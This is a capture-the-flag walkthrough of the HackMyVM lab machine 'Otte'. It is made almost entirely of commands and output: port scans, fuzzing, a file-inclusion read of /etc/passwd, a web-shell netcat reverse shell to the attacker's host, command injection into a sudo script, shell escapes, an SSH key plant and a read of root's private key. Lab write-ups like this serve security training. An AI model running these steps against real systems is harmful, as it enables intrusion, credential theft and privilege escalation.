HackMyVm Otte Walkthrough
https://hackmyvm.eu/machines/machine.php?vm=Otte
Scan ports first.
nmap -sV -sC -p- -oN ports.log 192.168.56.100
Nmap scan report for 192.168.56.100 (192.168.56.100)
Host is up (0.00099s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 ftp ftp 89 May 15 12:25 note.txt
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 e8:38:58:1b:75:c5:53:47:32:10:d4:12:79:69:c8:ad (RSA)
| 256 35:92:34:4e:cd:65:c6:08:20:76:35:ba:d9:09:64:65 (ECDSA)
|_ 256 a2:87:9f:60:a4:0d:c5:43:6a:4f:02:79:56:ff:6e:d9 (ED25519)
80/tcp open http Apache httpd 2.4.38
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Siemens - Root authentification
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: 401 Unauthorized
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernelVisit ftp anonymous, get note.txt.
cat note.txt
Hi thomas ! I put on you personal folder the php code you asked me !
See you later +++Visit port 80, need authentication.
[image-20210523214949625.png]
Following the hint, search default credentials of siemens router. (This step is hard for me because I never used siemens router)
https://www.192-168-1-1-ip.co/router/siemens/siemens/17622/After some failure, we get the correct credentials.
root zP2wxY4uEThen we can scan folder and files.
gobuster dir -u http://192.168.56.100 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard -o 80.log -U root -P zP2wxY4uE
/index.php (Status: 200) [Size: 28]
/image (Status: 200) [Size: 47076]
/config.php (Status: 200) [Size: 0]
/thinkgeek.php (Status: 200) [Size: 28]Fuzz thinkgeek.php.
wfuzz -u 'http://192.168.56.100/thinkgeek.php?FUZZ=id' -w /usr/share/seclists/Discovery/Web-Content/big.txt --basic root:zP2wxY4uE --hh 28
000007535: 200 0 L 0 W 0 Ch "file" Try LFI.
curl -u root:zP2wxY4uE 'http://192.168.56.100/thinkgeek.php?file=../../../../etc/passwd'
root:x:0:0:root:/root:/bin/bash
...
thomas:x:1000:1000:thomas,,,:/home/thomas:/bin/bash
...
laetitia:x:1001:1001:,,,:/home/laetitia:/bin/bash
cedric:x:1002:1002:,,,:/home/cedric:/bin/bashFollow the hint of note.txt, fuzz /home/thomas/*.php.
wfuzz -u 'http://192.168.56.100/thinkgeek.php?file=../../../../home/thomas/FUZZ.php' -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt --basic root:zP2wxY4uE --hh 0
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000016344: 200 2 L 3 W 20 Ch "shell" Fuzz the parameter of shell.php.
wfuzz -u 'http://192.168.56.100/thinkgeek.php?file=../../../../home/thomas/shell.php&FUZZ=id' -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt --basic root:zP2wxY4uE --hh 20
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000004959: 200 3 L 6 W 74 Ch "command"Visit shell.php, run reverse shell code.
http://192.168.56.100/thinkgeek.php?file=../../../../home/thomas/shell.php&command=nc%20192.168.56.150%201234%20-e%20/bin/bashIn another terminal, listen to port 1234, and get reverse shell.
~ nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:59386.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)Upgrade to interactive shell.
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@otte:/var/www/html$In /home/thomas, get nightmare.txt.
www-data@otte:/home/thomas$ ls -la
ls -la
total 100
drwxr-xr-x 4 thomas thomas 4096 May 20 09:46 .
drwxr-xr-x 5 root root 4096 May 16 12:34 ..
-rw------- 1 thomas thomas 50 May 20 09:46 .Xauthority
lrwxrwxrwx 1 thomas thomas 9 May 16 13:25 .bash_history -> /dev/null
-rw-r--r-- 1 thomas thomas 220 May 15 12:12 .bash_logout
-rw-r--r-- 1 thomas thomas 3526 May 17 14:42 .bashrc
drwxr-xr-x 3 thomas thomas 4096 May 15 14:00 .local
-rw-r--r-- 1 thomas thomas 807 May 15 12:12 .profile
drwx------ 2 thomas thomas 4096 May 17 09:35 .ssh
-rw-r--r-- 1 thomas thomas 61258 May 15 14:44 important_file
-rw-r--r-- 1 thomas thomas 122 May 15 14:56 nightmare.txt
-rwxr-xr-x 1 thomas thomas 93 May 17 09:15 shell.php
www-data@otte:/home/thomas$ cat nightmare.txt
cat nightmare.txt
who is the son of a bitch who replaced the signature on my file with fucking XXX?! I need to find the original signature!
www-data@otte:/home/thomas$Download important_file to local machine, check file content, the header is corrupted.
less important_file
important_file (press RETURN)
00000000: XXXXXXXXXXXXXXXX 0000 000d 4948 4452 .XXX........IHDR
00000010: 0000 012c 0000 012c 0806 0000 0079 7d8e ...,...,.....y}.
00000020: 7500 0000 1b74 4558 7443 7265 6174 696f u....tEXtCreatio
00000030: 6e20 5469 6d65 0031 3632 3130 3037 3337 n Time.162100737
00000040: 3935 3239 15fc b9e2 0000 37e9 4944 4154 9529......7.IDAT
00000050: 78da ed9d 8bab 7ecf 55de f38f 168a 2085 x.....~.U..... .
00000060: 2214 410a 2208 2294 8214 4428 8582 286a ".A."."...D(..(j
00000070: bd50 898a d6b6 62b0 28a2 a849 9a18 a3b9 .P....b.(..I.......
Search IDHR on google, looks like it's an PNG file. Replace XXXX's with a normal PNG file header.
head important_file
00000000: 8950 4e47 0d0a 1a0a 0000 000d 4948 4452 .XXX........IHDR
00000010: 0000 012c 0000 012c 0806 0000 0079 7d8e ...,...,.....y}.
00000020: 7500 0000 1b74 4558 7443 7265 6174 696f u....tEXtCreatio
00000030: 6e20 5469 6d65 0031 3632 3130 3037 3337 n Time.162100737
00000040: 3935 3239 15fc b9e2 0000 37e9 4944 4154 9529......7.IDAT
00000050: 78da ed9d 8bab 7ecf 55de f38f 168a 2085 x.....~.U..... .
00000060: 2214 410a 2208 2294 8214 4428 8582 286a ".A."."...D(..(j
00000070: bd50 898a d6b6 62b0 28a2 a849 9a18 a3b9 .P....b.(..I....
00000080: 7889 a931 3626 8d9a 8ba6 8947 3e5f ddb8 x..16&.....G>_..
00000090: ddee 99f5 ccac 35b3 67ef 773d 3090 7c7f ......5.g.w=0.|.Use cyberchef to render the PNG file, get a QR code.
[image-20210523212230214.png]
Render the QR code, get an link.
[image-20210523212429143.png]
Visit https://eqrcode.co/a/SVxQdM, get password of thomas.
Login ssh as thomas, check sudo.
thomas@otte:/home/laetitia$ sudo -l
Matching Defaults entries for thomas on otte:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User thomas may run the following commands on otte:
(laetitia) NOPASSWD: /usr/bin/python3 /home/laetitia/simpler.py *Run simpler.py, when ask for IP, input shell command.
thomas@otte:/home/laetitia$ sudo -u laetitia /usr/bin/python3 /home/laetitia/simpler.py -p
***********************************************
_ _
___(_)_ __ ___ _ __ | | ___ _ __ _ __ _ _
/ __| | '_ ` _ \| '_ \| |/ _ \ '__| '_ \| | | |
\__ \ | | | | | | |_) | | __/ |_ | |_) | |_| |
|___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
|_| |_| |___/
@ironhackers.es
***********************************************
Enter an IP: $("/bin/bash")
laetitia@otte:~$This shell is not interactive, we need to run 'nc x.x.x.x xxxx -e /bin/bash' to get another reverse shell, which is interactive.
[image-20210523220810457.png]
Check sudo again, as laetitia.
laetitia@otte:~$ sudo -l
sudo -l
Matching Defaults entries for laetitia on otte:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User laetitia may run the following commands on otte:
(cedric) NOPASSWD: /usr/bin/w3mUse php to create a temporary http server on local machine, use w3m visit port 80, and spawn a shell.
sudo -u cedric /usr/bin/w3m http://192.168.56.150Then run !/bin/bash, now we are user cedric.
[image-20210523221401950.png]
In /home/cedric/.ssh, upload id_rsa.pub.
wget http://192.168.56.150/id_rsa.pub -O authorized_keysThen we can login ssh as cedric.
Check sudo again.
cedric@otte:~$ sudo -l
Matching Defaults entries for cedric on otte:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User cedric may run the following commands on otte:
(ALL : ALL) NOPASSWD: /usr/bin/mmwatchAfter check code of mmwatch, we can read id_rsa of root through mmwatch.
sudo /usr/bin/mmwatch "cat /root/.ssh/id_rsa"Then we can login ssh as root.
root@otte:~# id;hostname
uid=0(root) gid=0(root) groups=0(root)
otte
root@otte:~# ls -la /root
total 40
drwx------ 4 root root 4096 May 20 10:30 .
drwxr-xr-x 18 root root 4096 May 15 12:07 ..
lrwxrwxrwx 1 root root 9 May 16 13:25 .bash_history -> /dev/null
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwxr-xr-x 3 root root 4096 May 15 12:13 .local
-rw------- 1 root root 1500 May 15 13:23 .mysql_history
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rwx------ 1 root root 33 May 16 14:02 root.txt
drwx------ 2 root root 4096 May 16 13:24 .ssh
-rw-r--r-- 1 root root 173 May 15 12:19 .wget-hsts
-rw------- 1 root root 100 May 20 10:30 .Xauthority